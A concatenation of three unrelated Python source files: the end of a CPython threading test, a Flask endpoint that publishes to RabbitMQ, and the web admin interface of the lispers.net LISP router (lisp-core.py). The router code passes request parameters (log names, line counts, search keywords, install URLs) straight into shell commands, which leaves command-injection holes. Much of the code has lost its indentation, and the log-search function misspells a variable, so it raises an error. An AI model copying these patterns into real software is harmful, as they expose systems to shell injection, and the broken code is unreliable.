mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assert_(tid in threading._active)
self.assert_(isinstance(threading._active[tid],
threading._DummyThread))
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.setDaemon(True) # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
worker_started.wait()
if verbose:
print " verifying worker hasn't exited"
self.assert_(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assert_(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
for i in xrange(1, 1000):
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertFalse(t in l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
class ThreadJoinOnShutdown(unittest.TestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" + script
import subprocess
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
self.failIf(rc == 2, "interpreter was blocked")
self.failUnless(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.currentThread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
import os
if not hasattr(os, 'fork'):
return
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.currentThread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
import os
if not hasattr(os, 'fork'):
return
# Skip platforms with known problems forking from a worker thread.
# See http://bugs.python.org/issue3863.
if sys.platform in ('freebsd4', 'freebsd5', 'freebsd6', 'os2emx'):
print >>sys.stderr, ('Skipping test_3_join_in_forked_from_thread'
' due to known OS bugs on'), sys.platform
return
script = """if 1:
main_thread = threading.currentThread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
def test_main():
test.test_support.run_unittest(ThreadTests,
ThreadJoinOnShutdown)
if __name__ == "__main__":
test_main()
|
__init__.py
|
import json
import logging
import time
from .config import Config
from .publisher import Publisher
from .consumer import Consumer
from multiprocessing import Process
from flask import Flask, request, Response
logger = logging.getLogger('GW: RabbitMQ app')
def create_app():
app = Flask(__name__)
app.config.from_object(Config)
@app.route("/publish", methods=['POST'])
def mq_service():
        try:
            logger.info("Inside publish function")
            data = request.json
            # Publish the file reference to RabbitMQ and start a consumer
            # process to receive it.
            file_name = data.get("file_name", None)
            bucket_name = data.get("bucket_name", None)
            logger.info(f"file_name : {file_name}")
            logger.info(f"bucket_name : {bucket_name}")
            publisher = Process(target=Publisher.run, args=(bucket_name, file_name))
            publisher.start()
            consumer = Process(target=Consumer.run)
            consumer.start()
            ret = {"err": "none"}
        except Exception as error:
            ret = {"err": str(error)}
            logger.error(f'main: error {error}')
        return Response(json.dumps(ret), mimetype='application/json')
return app
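# Example request (hypothetical host/port, assuming the Flask dev server runs
# on localhost:5000):
#
#   curl -X POST http://localhost:5000/publish \
#        -H "Content-Type: application/json" \
#        -d '{"file_name": "example.csv", "bucket_name": "example-bucket"}'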
|
lisp-core.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-core.py
#
# This is the core process that is used to demux to the specific LISP
# functional components. The 4342 listen socket is centralized here.
#
#
# +------------- data encapsulation via network --------------+
# | |
# | IPC when mr & ms colocated |
# | +--------------------------------+ |
# | | | |
# | | IPC when mr & ddt colo | |
# | | +------------+ | |
# | | | | | |
# | | | v v v 4341
# +-------------+ +----------+ +----------+ +----------+ +----------+
# | lisp-[ir]tr | | lisp-mr | | lisp-ddt | | lisp-ms | | lisp-etr |
# +-------------+ +----------+ +----------+ +----------+ +----------+
# ^ IPC ^ IPC ^ IPC ^ IPC ^ IPC
# | | | | |
# | | | | |
# | | | | |
# +--------------+--------------+--------------+--------------+
# |
# | for dispatching control messages
# +-----------+
# | lisp-core |
# +-----------+
# | 4342
# |
# via network
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import multiprocessing
import threading
import commands
import time
import os
import bottle
from cherrypy import wsgiserver
from cherrypy.wsgiserver.ssl_pyopenssl import pyOpenSSLAdapter
#from OpenSSL import SSL
import json
import sys
import socket
import thread
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_build_date = ""
lisp_control_listen_socket = None
lisp_ipc_socket = None
lisp_ipc_control_socket = None
lisp_sockets = [None, None, None]
lisp_encap_socket = None
#------------------------------------------------------------------------------
#
# lisp_api_get
#
# Ask the LISP subsystem for configuration information.
#
@bottle.route('/lisp/api', method="get")
@bottle.route('/lisp/api/<command>', method="get")
@bottle.route('/lisp/api/<command>/<data_structure>', method="get")
def lisp_api_get(command = "", data_structure=""):
data = [{ "?" : [{"?" : "not-auth"}] }]
#
# Authenticate.
#
if (bottle.request.auth != None):
username, pw = bottle.request.auth
if (lispconfig.lisp_find_user_account(username, pw) == False):
return(json.dumps(data))
#endif
else:
if (bottle.request.headers["User-Agent"].find("python") != -1):
return(json.dumps(data))
#endif
if (lispconfig.lisp_validate_user() == False):
return(json.dumps(data))
#endif
#endif
#
# First check for dynamic data. That is go get data from appropriate
# process. Return from process in JSON format.
#
if (command == "data" and data_structure != ""):
jdata = bottle.request.body.readline()
data = json.loads(jdata) if jdata != "" else ""
if (data != ""): data = data.values()[0]
if (data == []): data = ""
if (type(data) == dict and type(data.values()[0]) == dict):
data = data.values()[0]
#endif
data = lisp_get_api_data(data_structure, data)
return(data)
#endif
#
# A valid user can access data now.
#
if (command != ""):
command = "lisp " + command
else:
jdata = bottle.request.body.readline()
if (jdata == ""):
data = [{ "?" : [{"?" : "no-body"}] }]
return(json.dumps(data))
#endif
data = json.loads(jdata)
command = data.keys()[0]
#endif
data = lispconfig.lisp_get_clause_for_api(command)
return(json.dumps(data))
#enddef
#
# lisp_get_api_system
#
# Return system information in dictionary array (JSON format).
#
def lisp_get_api_system():
data = {}
data["hostname"] = socket.gethostname()
data["system-uptime"] = commands.getoutput("uptime")
data["lisp-uptime"] = lisp.lisp_print_elapsed(lisp.lisp_uptime)
data["lisp-version"] = lisp.lisp_version
yesno = "yes" if os.path.exists("./logs/lisp-traceback.log") else "no"
data["traceback-log"] = yesno
v4 = lisp.lisp_myrlocs[0]
v6 = lisp.lisp_myrlocs[1]
v4 = "none" if (v4 == None) else v4.print_address_no_iid()
v6 = "none" if (v6 == None) else v6.print_address_no_iid()
data["lisp-rlocs"] = [v4, v6]
return(json.dumps(data))
#enddef
#
# lisp_get_api_data
#
# Send IPC message to process that owns the dynamic data strucutre we
# are retrieving via the API. Variable data for the 'map-cache' and
# 'site-cache' API contains:
#
# { "eid-prefix" : <eid>, "group-prefix" : <group>, "instance-id" : <iid> }
#
# For 'map-resolver' and 'map-server" API contains:
#
# { "address" : <address>" } or { "dns-name" : <dns-name> }
#
def lisp_get_api_data(data_structure, data):
valid_apis = ["site-cache", "map-cache", "system", "map-resolver",
"map-server", "database-mapping"]
if (data_structure not in valid_apis): return(json.dumps([]))
#
# lisp-core process handles the system lispapi.get_system() API.
#
if (data_structure == "system"): return(lisp_get_api_system())
#
# Build IPC, acquire lock, and send IPC message. Then wait.
#
if (data != ""): data = json.dumps(data)
ipc = lisp.lisp_api_ipc("lisp-core", data_structure + "%" + data)
if (data_structure in ["map-cache", "map-resolver"]):
if (lisp.lisp_is_running("lisp-rtr")):
lisp.lisp_ipc_lock.acquire()
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-rtr")
elif (lisp.lisp_is_running("lisp-itr")):
lisp.lisp_ipc_lock.acquire()
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-itr")
else:
return(json.dumps([]))
#endif
#endif
if (data_structure in ["map-server", "database-mapping"]):
if (lisp.lisp_is_running("lisp-etr")):
lisp.lisp_ipc_lock.acquire()
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
else:
return(json.dumps([]))
#endif
#endif
if (data_structure == "site-cache"):
if (lisp.lisp_is_running("lisp-ms")):
lisp.lisp_ipc_lock.acquire()
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-ms")
else:
return(json.dumps([]))
#endif
#endif
lisp.lprint("Waiting for api get-data '{}', parmameters: '{}'".format( \
data_structure, data))
opcode, source, port, output = lisp.lisp_receive(lisp_ipc_socket, True)
lisp.lisp_ipc_lock.release()
return(output)
#enddef
#
# lisp_api_put_delete
#
# Tell the LISP subsystem to add/replace or remove a command clause.
#
@bottle.route('/lisp/api', method="put")
@bottle.route('/lisp/api/<command>', method="put")
@bottle.route('/lisp/api/<command>', method="delete")
def lisp_api_put_delete(command = ""):
data = [{ "?" : [{"?" : "not-auth"}] }]
if (bottle.request.auth == None): return(data)
#
# Authenticate.
#
if (bottle.request.auth != None):
username, pw = bottle.request.auth
if (lispconfig.lisp_find_user_account(username, pw) == False):
return(json.dumps(data))
#endif
else:
if (bottle.request.headers["User-Agent"].find("python") != -1):
return(json.dumps(data))
#endif
if (lispconfig.lisp_validate_user() == False):
return(json.dumps(data))
#endif
#endif
#
# If the request is to add, change, or remove a "user-account" command,
# the validated user must be configured as a superuser.
#
if (command == "user-account"):
if (lispconfig.lisp_is_user_superuser(username) == False):
data = [{ "user-account" : [{"?" : "not-auth"}] }]
return(json.dumps(data))
#endif
#endif
#
# A valid user can access data now.
#
jdata = bottle.request.body.readline()
if (jdata == ""):
data = [{ "?" : [{"?" : "no-body"}] }]
return(json.dumps(data))
#endif
data = json.loads(jdata)
if (command != ""):
command = "lisp " + command
else:
command = data[0].keys()[0]
#endif
#
# Add, replace, or remove lines from configuration file. Grab config
# file lock.
#
lisp.lisp_ipc_lock.acquire()
if (bottle.request.method == "DELETE"):
data = lispconfig.lisp_remove_clause_for_api(data)
else:
data = lispconfig.lisp_put_clause_for_api(data)
#endif
lisp.lisp_ipc_lock.release()
return(json.dumps(data))
#enddef
#
# lisp_show_api_doc
#
@bottle.route('/lisp/show/api-doc', method="get")
def lisp_show_api_doc():
if (os.path.exists("lispapi.py")): os.system("pydoc lispapi > lispapi.txt")
if (os.path.exists("lispapi.txt") == False):
return("lispapi.txt file not found")
#endif
return(bottle.static_file("lispapi.txt", root="./"))
#enddef
#
# lisp_show_command_doc
#
@bottle.route('/lisp/show/command-doc', method="get")
def lisp_show_command_doc():
return(bottle.static_file("lisp.config.example", root="./",
mimetype="text/plain"))
#enddef
#
# lisp_show_lisp_xtr
#
# Display the show-xtr file that the go data-plane lisp-xtr writes to.
#
@bottle.route('/lisp/show/lisp-xtr', method="get")
def lisp_show_lisp_xtr():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Special case to look for a other data-planes. If it does not exist, check
# the lispers.net go data-plane.
#
if (os.path.exists("./show-ztr")):
f = open("./show-ztr", "r"); lines = f.read(); f.close()
else:
f = open("./show-xtr", "r"); lines = f.read(); f.close()
#endif
new = ""
lines = lines.split("\n")
for line in lines:
if (line[0:4] == " "): new += lisp.lisp_space(4)
if (line[0:2] == " "): new += lisp.lisp_space(2)
new += line + "<br>"
#endfor
new = lisp.convert_font(new)
return(lisp.lisp_print_sans(new))
#enddef
#
# lisp_show_keys
#
# Display LISP crypto-key-list to ITR, ETR, RTR.
#
@bottle.route('/lisp/show/<xtr>/keys', method="get")
def lisp_show_keys(xtr):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
superuser = lispconfig.lisp_is_user_superuser(None)
if (superuser == False):
output = "Permission denied"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
if (xtr not in ["itr", "etr", "rtr"]):
output = "Invalid URL"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
command = "show {}-keys".format(xtr)
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_geo_map
#
# Use Google Maps API to draw a circle on a geographical map. The html file
# ./lispers.net-geo.html is javascript to call the Google API.
#
@bottle.route('/lisp/geo-map/<geo_prefix>')
def lisp_show_geo_map(geo_prefix):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
geo_prefix = geo_prefix.split("-")
geo_prefix = "-".join(geo_prefix[0:-1]) + "/" + geo_prefix[-1]
geo = lisp.lisp_geo("")
geo.parse_geo_string(geo_prefix)
lat, lon = geo.dms_to_decimal()
radius = geo.radius * 1000
r = open("./lispers.net-geo.html", "r"); html = r.read(); r.close()
html = html.replace("$LAT", str(lat))
html = html.replace("$LON", str(lon))
html = html.replace("$RADIUS", str(radius))
return(html)
#enddef
#
# lisp_core_login_page
#
# Print to browser landing page.
#
@bottle.route('/lisp/login', method="get")
def lisp_core_login_page():
return(lispconfig.lisp_login_page())
#enddef
#
# lisp_core_do_login
#
# Get login info entered in forms data. Validate and add to cookie database.
# If valid, take user to landing page. Otherwise, go back to login page.
#
@bottle.route('/lisp/login', method="post")
def lisp_core_do_login():
if (lispconfig.lisp_validate_user()):
return(lispconfig.lisp_landing_page())
#endif
return(lisp_core_login_page())
#enddef
#
# lisp_core_landing_page
#
# Print to browser landing page.
#
@bottle.route('/lisp')
def lisp_core_landing_page():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_landing_page())
#enddef
#
# lisp_core_traceback_page
#
# Look in log files for Traceback messages.
#
@bottle.route('/lisp/traceback')
def lisp_core_traceback_page():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
clean = True
#
# Check explicit lisp-traceback.log.
#
if (os.path.exists("./logs/lisp-traceback.log")):
output = commands.getoutput("cat ./logs/lisp-traceback.log")
if (output):
output = output.replace("----------", "<b>----------</b>")
output = output.replace("\n", "<br>")
clean = False
#endif
#endif
#
# Look for Traceback messages in log files.
#
if (clean):
output = ""
cmd = "egrep --with-filename Traceback ./logs/*.log"
log_files = commands.getoutput(cmd)
log_files = log_files.split("\n")
for lf in log_files:
if (lf.find(":") == -1): continue
line = lf.split(":")
if (line[1] == "0"): continue
output += "Found Tracebacks in log file {}<br>".format(line[0])
clean = False
#endfor
output = output[0:-4]
#endif
if (clean):
output = "No Tracebacks found - a stable system is a happy system"
#endif
output = lisp.lisp_print_cour(output)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_core_not_supported
#
# Print to browser landing page.
#
@bottle.route('/lisp/show/not-supported')
def lisp_core_not_supported():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_not_supported())
#enddef
#
# lisp_show_status_command
#
# Show some version and system info.
#
@bottle.route('/lisp/show/status')
def lisp_show_status_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Do not print out "show configuration" button or the debug drop-down menu.
#
output = ""
superuser = lispconfig.lisp_is_user_superuser(None)
if (superuser):
sc = lisp.lisp_button("show configuration", "/lisp/show/conf")
dc = lisp.lisp_button("show configuration diff", "/lisp/show/diff")
ac = lisp.lisp_button("archive configuration", "/lisp/archive/conf")
cc = lisp.lisp_button("clear configuration", "/lisp/clear/conf/verify")
lf = lisp.lisp_button("log flows", "/lisp/log/flows")
ils = lisp.lisp_button("install LISP software", "/lisp/install/image")
rs = lisp.lisp_button("restart LISP subsystem", "/lisp/restart/verify")
output = "<center>{}{}{}{}{}{}{}</center><hr>".format(sc, dc, ac, cc,
lf, ils, rs)
#endif
sys_uptime = commands.getoutput("uptime")
uname = commands.getoutput("uname -pv")
main_version = lisp.lisp_version.replace("+", "")
#
# This is really broken. It returns twice as many CPUs than really on the
# machine (on MacOS).
#
cpu_count = multiprocessing.cpu_count()
i = sys_uptime.find(", load")
sys_uptime = sys_uptime[0:i]
elapsed = lisp.lisp_print_elapsed(lisp.lisp_uptime)
top = "Not available"
#
# Get LISP process status.
#
command = "ps auww" if lisp.lisp_is_macos() else "ps aux"
status = commands.getoutput( \
"{} | egrep 'PID|python lisp|python -O lisp' | egrep -v grep". \
format(command))
status = status.replace(" ", lisp.space(1))
status = status.replace("\n", "<br>")
#
# top on MacOS.
#
if (uname.find("Darwin") != -1):
cpu_count = cpu_count / 2
top = commands.getoutput("top -l 1 | head -50")
top = top.split("PID")
top = top[0]
#
# Massage the 'top' output so we can have one line per information
# line.
#
i = top.find("Load Avg")
j = top[0:i].find("threads")
processes = top[0:j+7]
top = processes + "<br>" + top[i::]
i = top.find("CPU usage")
top = top[0:i] + "<br>" + top[i::]
i = top.find("SharedLibs:")
top = top[0:i] + "<br>" + top[i::]
i = top.find("MemRegions")
top = top[0:i] + "<br>" + top[i::]
i = top.find("PhysMem")
top = top[0:i] + "<br>" + top[i::]
i = top.find("VM:")
top = top[0:i] + "<br>" + top[i::]
i = top.find("Networks")
top = top[0:i] + "<br>" + top[i::]
i = top.find("Disks")
top = top[0:i] + "<br>" + top[i::]
else:
#
# top on Fedora Linux.
#
lines = commands.getoutput("top -b -n 1 | head -50")
lines = lines.split("PID")
lines[1] = lines[1].replace(" ", lisp.space(1))
lines = lines[0] + lines[1]
top = lines.replace("\n", "<br>")
#endif
release_notes = commands.getoutput("cat release-notes.txt")
release_notes = release_notes.replace("\n", "<br>")
output += '''
<br><table align="center" border="1" cellspacing="3x" cellpadding="5x">
<tr>
<td width="20%"><i>LISP Subsystem Version:<br>
LISP Release {} Build Date:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>LISP Subsystem Uptime:<br>System Uptime:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>System Architecture:<br>
Number of CPUs:<font face="Courier New">{}{}</font></td>
<td width="80%"><font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>LISP Process Status:</i></td>
<td width="80%">
<div style="height: 100px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
<tr>
<td width="20%" valign="top"><i>System Resource Utilization:</i></td>
<td width="80%">
<div style="height: 200px; overflow: auto">
<font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>Release Notes:</i></td>
<td width="80%">
<div style="height: 300px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
</table>
'''.format(main_version, lisp.lisp_version, lisp_build_date, elapsed,
sys_uptime, lisp.lisp_space(1), cpu_count, uname, status, top,
release_notes)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_show_conf_command
#
# Show configuration file.
#
@bottle.route('/lisp/show/conf')
def lisp_show_conf_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(bottle.static_file("lisp.config", root="./", mimetype="text/plain"))
#enddef
#
# lisp_show_diff_command
#
# Show configuration diff file.
#
@bottle.route('/lisp/show/diff')
def lisp_show_diff_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(bottle.static_file("lisp.config.diff", root="./",
mimetype="text/plain"))
#enddef
#
# lisp_archive_conf_command
#
# Save a copy of lisp.config in lisp.config.archive.
#
@bottle.route('/lisp/archive/conf')
def lisp_archive_conf_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
lisp.lisp_ipc_lock.acquire()
os.system("cp ./lisp.config ./lisp.config.archive")
lisp.lisp_ipc_lock.release()
output = "Configuration file saved to "
output = lisp.lisp_print_sans(output)
output += lisp.lisp_print_cour("./lisp.config.archive")
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_clear_conf_command
#
# Clear contents of the lisp.config file.
#
@bottle.route('/lisp/clear/conf')
def lisp_clear_conf_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
os.system("cp ./lisp.config ./lisp.config.before-clear")
lisp.lisp_ipc_lock.acquire()
lisp_core_cp_lisp_config()
lisp.lisp_ipc_lock.release()
output = "Configuration cleared, a backup copy is stored in "
output = lisp.lisp_print_sans(output)
output += lisp.lisp_print_cour("./lisp.config.before-clear")
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_clear_conf_verify_command
#
# Ask user if they really want to clear the config file.
#
@bottle.route('/lisp/clear/conf/verify')
def lisp_clear_conf_verify_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
output = "<br>Are you sure you want to clear the configuration?"
output = lisp.lisp_print_sans(output)
yes = lisp.lisp_button("yes", "/lisp/clear/conf")
cancel = lisp.lisp_button("cancel", "/lisp")
output += yes + cancel + "<br>"
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_get_port_on_command_line
#
# Figure out if the lisp-core.pyo process was started with a parameter. If so,
# it is the port number we use for bottle. We want to restart using the same
# parameters.
#
def lisp_get_port_on_command_line():
port = ""
for p in ["443", "-8080", "8080"]:
c = 'ps auxww | egrep "lisp-core.pyo {}" | egrep -v grep'.format(p)
output = commands.getoutput(c)
if (output == ""): continue
output = output.split("\n")[0]
output = output.split(" ")
if (output[-2] == "lisp-core.pyo" and output[-1] == p): port = p
break
#endfor
return(port)
#enddef
#
# lisp_restart_command
#
# Restart the LISP subsystem.
#
@bottle.route('/lisp/restart')
def lisp_restart_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Check to see if requiretty is in effect. If so, we can't sudo, so tell
# user.
#
line = commands.getoutput("egrep requiretty /etc/sudoers").split(" ")
if (line[-1] == "requiretty" and line[0] == "Defaults"):
output = "Need to remove 'requiretty' from /etc/sudoers"
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
lisp.lprint(lisp.bold("LISP subsystem restart request received", False))
#
# Check if we should start the process with 443 (or -8080) as the port
# number for the lisp-core should run on.
#
port = lisp_get_port_on_command_line()
#
# Build command and launch it in another process.
#
c = "sleep 1; sudo ./RESTART-LISP {}".format(port)
thread.start_new_thread(os.system, (c, ))
output = lisp.lisp_print_sans("Restarting LISP subsystem ...")
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_restart_verify_command
#
# Ask user if they really want to restart the LISP subsystem.
#
@bottle.route('/lisp/restart/verify')
def lisp_restart_verify_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
output = "<br>Are you sure you want to restart the LISP subsystem?"
output = lisp.lisp_print_sans(output)
yes = lisp.lisp_button("yes", "/lisp/restart")
cancel = lisp.lisp_button("cancel", "/lisp")
output += yes + cancel + "<br>"
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_install_command
#
# Install tgz file user supplied in html form.
#
@bottle.route('/lisp/install', method="post")
def lisp_install_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
image = bottle.request.forms.get("image_url")
if (image.find("lispers.net") == -1 or image.find(".tgz") == -1):
string = "Invalid install request for file {}".format(image)
lisp.lprint(lisp.bold(string, False))
output = lisp.lisp_print_sans("Invalid lispers.net tarball file name")
return(lispconfig.lisp_show_wrapper(output))
#endif
if (lisp.lisp_is_ubuntu()):
c = "python lisp-get-bits.pyo {} force 2>&1 > /dev/null".format(image)
else:
c = "python lisp-get-bits.pyo {} force >& /dev/null".format(image)
#endif
status = os.system(c)
image_file = image.split("/")[-1]
if (os.path.exists(image_file)):
release = image.split("release-")[1]
release = release.split(".tgz")[0]
output = "Install completed for release {}".format(release)
output = lisp.lisp_print_sans(output)
output += "<br><br>" + lisp.lisp_button("restart LISP subsystem",
"/lisp/restart/verify") + "<br>"
else:
string = lisp.lisp_print_cour(image)
output = "Install failed for file {}".format(string)
output = lisp.lisp_print_sans(output)
#endif
string = "Install request for file {} {}".format(image,
"succeeded" if (status == 0) else "failed")
lisp.lprint(lisp.bold(string, False))
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_install_get_image
#
# Ask user for tgz image to install.
#
@bottle.route('/lisp/install/image')
def lisp_install_get_image():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
string = lisp.lisp_print_sans("<br>Enter lispers.net tarball URL:")
output = '''
<form action="/lisp/install" method="post" style="display: inline;">
{}
<input type="text" name="image_url" size="75" required/>
<input type="submit" style="background-color:transparent;border-radius:10px;" value="Submit" />
</form><br>'''.format(string)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_log_flows_command
#
# Touch file ./log-flows so we can have the user request a dump of the memory
# based flow log.
#
@bottle.route('/lisp/log/flows')
def lisp_log_flows_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
os.system("touch ./log-flows")
output = lisp.lisp_print_sans("Flow data appended to file ")
out = "<a href='/lisp/show/log/lisp-flow/100'>logs/lisp-flows.log</a>"
output += lisp.lisp_print_cour(out)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_search_log_command
#
# Search the <num> tail lines of <name> and display in <hr> separated format
# with the search keyword highlighted in blue.
#
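# For example (illustrative URL only), /lisp/search/log/lisp-flow/100/RLOC
# searches the last 100 lines of logs/lisp-flow.log for the keyword "RLOC".
#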
@bottle.route('/lisp/search/log/<name>/<num>/<keyword>')
def lisp_search_log_command(name = "", num = "", keyword = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
command = "tail -n {} logs/{}.log | egrep -B10 -A10 {}".format(num, name,
keyword)
output = commands.getoutput(command)
if (output):
        occurrences = output.count(keyword)
output = lisp.convert_font(output)
output = output.replace("--\n--\n", "--\n")
output = output.replace("\n", "<br>")
output = output.replace("--<br>", "<hr>")
output = "Found <b>{}</b> occurences<hr>".format(occurences) + output
else:
output = "Keyword {} not found".format(keyword)
#endif
#
# Highlight keyword in blue.
#
blue = "<font color='blue'><b>{}</b>".format(keyword)
output = output.replace(keyword, blue)
output = output.replace(keyword, keyword + "</font>")
output = lisp.lisp_print_cour(output)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_search_log_command_input
#
# Get input form data for keyword to search on.
#
@bottle.post('/lisp/search/log/<name>/<num>')
def lisp_search_log_command_input(name = "", num=""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
keyword = bottle.request.forms.get("keyword")
return(lisp_search_log_command(name, num, keyword))
#enddef
#
# lisp_show_log_name_command
#
# Show trace log file.
#
@bottle.route('/lisp/show/log/<name>/<num>')
def lisp_show_log_name_command(name = "", num=""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
    # Default to printing out the last 100 lines and convert to html bold.
#
if (num == ""): num = 100
header = '''
<form action="/lisp/search/log/{}/{}" method="post">
<i>Keyword search:</i>
<input type="text" name="keyword" />
<input style="background-color:transparent;border-radius:10px;" type="submit" value="Submit" />
</form><hr>
'''.format(name, num)
if (os.path.exists("logs/{}.log".format(name))):
output = commands.getoutput("tail -n {} logs/{}.log".format(num, name))
output = lisp.convert_font(output)
output = output.replace("\n", "<br>")
output = header + lisp.lisp_print_cour(output)
else:
a = lisp.lisp_print_sans("File")
aa = lisp.lisp_print_cour("logs/{}.log".format(name))
aaa = lisp.lisp_print_sans("does not exist")
output = "{} {} {}".format(a, aa, aaa)
#endif
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
